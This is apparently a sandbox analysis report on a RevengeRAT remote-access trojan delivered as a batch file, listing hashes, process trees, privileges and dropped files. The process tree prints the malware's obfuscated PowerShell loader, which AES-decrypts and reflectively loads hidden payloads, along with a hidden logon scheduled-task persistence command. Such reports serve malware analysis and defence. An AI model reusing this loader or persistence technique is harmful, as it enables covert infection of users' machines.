revengerat | 0259988df01a82ad5936bc17d01a96b07b8bd530790bf47277535edef3100ffc

Analysis

max time kernel
56s
max time network
23s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11/06/2024, 05:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.bat
Size

265KB
MD5

01e96014af705a61d5ca83d367517549
SHA1

403b1418e8ff1b7bb218cf87bfb7cc45905ea3e1
SHA256

0259988df01a82ad5936bc17d01a96b07b8bd530790bf47277535edef3100ffc
SHA512

af19bf403f1204bef43d12b9c6872a0e67da2f8a6d168dd14481968c5d418fa982a3aa8677f7b011f39314ef6a351e785af3d46e692443cc23ea1fa3b2cbb7d2
SSDEEP

6144:c5G5RlzeUqntbabTty2g13glFyDZdCq0PfxGY:c5G5RUUguTE31QqddT0PZGY

Score

10^/10

revengerat execution stealer trojan

Malware Config

Extracted

Family

revengerat

Mutex

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/1632-251-0x0000016736700000-0x0000016736708000-memory.dmp	revengerat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3216	powershell.exe
4476	powershell.exe
1632	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3216	powershell.exe
3216	powershell.exe
3216	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe
1632	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	4476	powershell.exe
Token: SeSecurityPrivilege	4476	powershell.exe
Token: SeTakeOwnershipPrivilege	4476	powershell.exe
Token: SeLoadDriverPrivilege	4476	powershell.exe
Token: SeSystemProfilePrivilege	4476	powershell.exe
Token: SeSystemtimePrivilege	4476	powershell.exe
Token: SeProfSingleProcessPrivilege	4476	powershell.exe
Token: SeIncBasePriorityPrivilege	4476	powershell.exe
Token: SeCreatePagefilePrivilege	4476	powershell.exe
Token: SeBackupPrivilege	4476	powershell.exe
Token: SeRestorePrivilege	4476	powershell.exe
Token: SeShutdownPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeSystemEnvironmentPrivilege	4476	powershell.exe
Token: SeRemoteShutdownPrivilege	4476	powershell.exe
Token: SeUndockPrivilege	4476	powershell.exe
Token: SeManageVolumePrivilege	4476	powershell.exe
Token: 33	4476	powershell.exe
Token: 34	4476	powershell.exe
Token: 35	4476	powershell.exe
Token: 36	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	4476	powershell.exe
Token: SeSecurityPrivilege	4476	powershell.exe
Token: SeTakeOwnershipPrivilege	4476	powershell.exe
Token: SeLoadDriverPrivilege	4476	powershell.exe
Token: SeSystemProfilePrivilege	4476	powershell.exe
Token: SeSystemtimePrivilege	4476	powershell.exe
Token: SeProfSingleProcessPrivilege	4476	powershell.exe
Token: SeIncBasePriorityPrivilege	4476	powershell.exe
Token: SeCreatePagefilePrivilege	4476	powershell.exe
Token: SeBackupPrivilege	4476	powershell.exe
Token: SeRestorePrivilege	4476	powershell.exe
Token: SeShutdownPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeSystemEnvironmentPrivilege	4476	powershell.exe
Token: SeRemoteShutdownPrivilege	4476	powershell.exe
Token: SeUndockPrivilege	4476	powershell.exe
Token: SeManageVolumePrivilege	4476	powershell.exe
Token: 33	4476	powershell.exe
Token: 34	4476	powershell.exe
Token: 35	4476	powershell.exe
Token: 36	4476	powershell.exe
Token: SeIncreaseQuotaPrivilege	4476	powershell.exe
Token: SeSecurityPrivilege	4476	powershell.exe
Token: SeTakeOwnershipPrivilege	4476	powershell.exe
Token: SeLoadDriverPrivilege	4476	powershell.exe
Token: SeSystemProfilePrivilege	4476	powershell.exe
Token: SeSystemtimePrivilege	4476	powershell.exe
Token: SeProfSingleProcessPrivilege	4476	powershell.exe
Token: SeIncBasePriorityPrivilege	4476	powershell.exe
Token: SeCreatePagefilePrivilege	4476	powershell.exe
Token: SeBackupPrivilege	4476	powershell.exe
Token: SeRestorePrivilege	4476	powershell.exe
Token: SeShutdownPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeSystemEnvironmentPrivilege	4476	powershell.exe
Token: SeRemoteShutdownPrivilege	4476	powershell.exe
Token: SeUndockPrivilege	4476	powershell.exe
Token: SeManageVolumePrivilege	4476	powershell.exe
Token: 33	4476	powershell.exe
Token: 34	4476	powershell.exe
Token: 35	4476	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4568 wrote to memory of 3684	4568	cmd.exe	73
PID 4568 wrote to memory of 3684	4568	cmd.exe	73
PID 3684 wrote to memory of 4664	3684	net.exe	74
PID 3684 wrote to memory of 4664	3684	net.exe	74
PID 4568 wrote to memory of 4416	4568	cmd.exe	75
PID 4568 wrote to memory of 4416	4568	cmd.exe	75
PID 4568 wrote to memory of 3216	4568	cmd.exe	76
PID 4568 wrote to memory of 3216	4568	cmd.exe	76
PID 3216 wrote to memory of 4476	3216	powershell.exe	77
PID 3216 wrote to memory of 4476	3216	powershell.exe	77
PID 3216 wrote to memory of 192	3216	powershell.exe	80
PID 3216 wrote to memory of 192	3216	powershell.exe	80
PID 192 wrote to memory of 448	192	WScript.exe	81
PID 192 wrote to memory of 448	192	WScript.exe	81
PID 448 wrote to memory of 2388	448	cmd.exe	83
PID 448 wrote to memory of 2388	448	cmd.exe	83
PID 2388 wrote to memory of 4496	2388	net.exe	84
PID 2388 wrote to memory of 4496	2388	net.exe	84
PID 448 wrote to memory of 164	448	cmd.exe	85
PID 448 wrote to memory of 164	448	cmd.exe	85
PID 448 wrote to memory of 1632	448	cmd.exe	86
PID 448 wrote to memory of 1632	448	cmd.exe	86
PID 1632 wrote to memory of 3340	1632	powershell.exe	54
PID 1632 wrote to memory of 1568	1632	powershell.exe	29
PID 1632 wrote to memory of 1364	1632	powershell.exe	26
PID 1632 wrote to memory of 1556	1632	powershell.exe	28
PID 1632 wrote to memory of 1156	1632	powershell.exe	21
PID 1632 wrote to memory of 2924	1632	powershell.exe	52
PID 1632 wrote to memory of 748	1632	powershell.exe	10
PID 1632 wrote to memory of 5080	1632	powershell.exe	62
PID 1632 wrote to memory of 2516	1632	powershell.exe	42
PID 1632 wrote to memory of 332	1632	powershell.exe	15
PID 1632 wrote to memory of 816	1632	powershell.exe	11
PID 1632 wrote to memory of 1700	1632	powershell.exe	32
PID 1632 wrote to memory of 2880	1632	powershell.exe	51
PID 1632 wrote to memory of 1692	1632	powershell.exe	31
PID 1632 wrote to memory of 1888	1632	powershell.exe	35
PID 1632 wrote to memory of 2824	1632	powershell.exe	49
PID 1632 wrote to memory of 1088	1632	powershell.exe	20
PID 1632 wrote to memory of 2268	1632	powershell.exe	40
PID 1632 wrote to memory of 1280	1632	powershell.exe	25
PID 1632 wrote to memory of 2652	1632	powershell.exe	45
PID 1632 wrote to memory of 1272	1632	powershell.exe	24
PID 1632 wrote to memory of 904	1632	powershell.exe	13
PID 1632 wrote to memory of 2640	1632	powershell.exe	44
PID 1632 wrote to memory of 1260	1632	powershell.exe	23
PID 1632 wrote to memory of 1456	1632	powershell.exe	27
PID 1632 wrote to memory of 864	1632	powershell.exe	12
PID 1632 wrote to memory of 2832	1632	powershell.exe	50
PID 1632 wrote to memory of 1784	1632	powershell.exe	33
PID 1632 wrote to memory of 2036	1632	powershell.exe	38
PID 1632 wrote to memory of 2616	1632	powershell.exe	64
PID 1632 wrote to memory of 1044	1632	powershell.exe	19
PID 1632 wrote to memory of 2024	1632	powershell.exe	37
PID 1632 wrote to memory of 4780	1632	powershell.exe	60
PID 1632 wrote to memory of 1036	1632	powershell.exe	18
PID 1632 wrote to memory of 640	1632	powershell.exe	17
PID 1632 wrote to memory of 2592	1632	powershell.exe	43
PID 1632 wrote to memory of 424	1632	powershell.exe	16
PID 1632 wrote to memory of 1604	1632	powershell.exe	30
PID 1632 wrote to memory of 1800	1632	powershell.exe	34
PID 1632 wrote to memory of 1200	1632	powershell.exe	22
PID 1632 wrote to memory of 2772	1632	powershell.exe	47
PID 1632 wrote to memory of 1588	1632	powershell.exe	39

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:816

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1044

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1156

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1200

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1692

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1888

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:2024

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2036

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1588

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2772

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2924

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('95fXsaIlcGmb66kIfwPk1Rgbc20oigIl2ZjrEVOMHi4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wjcEpBfUU+saUdwde7IiAQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dBbxa=New-Object System.IO.MemoryStream(,$param_var); $mlDCQ=New-Object System.IO.MemoryStream; $PXkUJ=New-Object System.IO.Compression.GZipStream($dBbxa, [IO.Compression.CompressionMode]::Decompress); $PXkUJ.CopyTo($mlDCQ); $PXkUJ.Dispose(); $dBbxa.Dispose(); $mlDCQ.Dispose(); $mlDCQ.ToArray();}function execute_function($param_var,$param2_var){ $VAZow=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IkZgf=$VAZow.EntryPoint; $IkZgf.Invoke($null, $param2_var);}$EKyfL = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $EKyfL;$XGvbw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKyfL).Split([Environment]::NewLine);foreach ($ezjrc in $XGvbw) { if ($ezjrc.StartsWith('BPOZEQjVjBpbWIFJNOov')) { $rjbAO=$ezjrc.Substring(20); break; }}$payloads_var=[string[]]$rjbAO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_994_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4476
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:192
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:448
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2388
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:4496
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('95fXsaIlcGmb66kIfwPk1Rgbc20oigIl2ZjrEVOMHi4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wjcEpBfUU+saUdwde7IiAQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dBbxa=New-Object System.IO.MemoryStream(,$param_var); $mlDCQ=New-Object System.IO.MemoryStream; $PXkUJ=New-Object System.IO.Compression.GZipStream($dBbxa, [IO.Compression.CompressionMode]::Decompress); $PXkUJ.CopyTo($mlDCQ); $PXkUJ.Dispose(); $dBbxa.Dispose(); $mlDCQ.Dispose(); $mlDCQ.ToArray();}function execute_function($param_var,$param2_var){ $VAZow=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IkZgf=$VAZow.EntryPoint; $IkZgf.Invoke($null, $param2_var);}$EKyfL = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.bat';$host.UI.RawUI.WindowTitle = $EKyfL;$XGvbw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($EKyfL).Split([Environment]::NewLine);foreach ($ezjrc in $XGvbw) { if ($ezjrc.StartsWith('BPOZEQjVjBpbWIFJNOov')) { $rjbAO=$ezjrc.Substring(20); break; }}$payloads_var=[string[]]$rjbAO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4780

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:5080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
aeb24b5729d62e81a27174f46d431126

SHA1
baa02ac3f99822d1915bac666450dc20727494bb

SHA256
d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471

SHA512
e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zrjh1qw.acf.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.bat

Filesize
265KB

MD5
01e96014af705a61d5ca83d367517549

SHA1
403b1418e8ff1b7bb218cf87bfb7cc45905ea3e1

SHA256
0259988df01a82ad5936bc17d01a96b07b8bd530790bf47277535edef3100ffc

SHA512
af19bf403f1204bef43d12b9c6872a0e67da2f8a6d168dd14481968c5d418fa982a3aa8677f7b011f39314ef6a351e785af3d46e692443cc23ea1fa3b2cbb7d2

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_994.vbs

Filesize
124B

MD5
6fe58f1c19141842ea8d52ef7868419a

SHA1
c4d791e43a0e2d418069cf4d1dd4a7cce7ab046f

SHA256
3cbc97a17fc03298d3cfd6a1a9c06c9e5255eb6d095d576af815556b031d4406

SHA512
516eec7ab2883366602dd662b94651d37c90c388bdea4766b70c2087cdb11bd1dafaba157507cf9b7cbb42c012444db0a68cc29de785ba2423f5d8303a3ba176

Download Submit
memory/640-214-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/816-211-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/864-220-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/904-218-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1036-223-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1088-228-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1156-230-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1272-219-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1364-210-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1456-213-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1556-216-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1568-215-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1632-251-0x0000016736700000-0x0000016736708000-memory.dmp

Filesize
32KB

Download
memory/1692-226-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/1888-212-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2024-221-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2268-227-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2516-217-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2616-229-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2772-224-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2832-222-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/2880-225-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/3216-47-0x00000120A36F0000-0x00000120A3766000-memory.dmp

Filesize
472KB

Download
memory/3216-3-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp

Filesize
4KB

Download
memory/3216-5-0x00000120A3160000-0x00000120A3182000-memory.dmp

Filesize
136KB

Download
memory/3216-158-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/3216-8-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/3216-11-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/3216-36-0x00000120A32E0000-0x00000120A331C000-memory.dmp

Filesize
240KB

Download
memory/3216-58-0x00000120A3360000-0x00000120A3394000-memory.dmp

Filesize
208KB

Download
memory/3216-57-0x00000120A32C0000-0x00000120A32C8000-memory.dmp

Filesize
32KB

Download
memory/3216-56-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/3340-209-0x00007FFA3F220000-0x00007FFA3F230000-memory.dmp

Filesize
64KB

Download
memory/3340-167-0x0000000000660000-0x000000000068A000-memory.dmp

Filesize
168KB

Download
memory/4476-102-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-68-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-71-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download
memory/4476-82-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp

Filesize
9.9MB

Download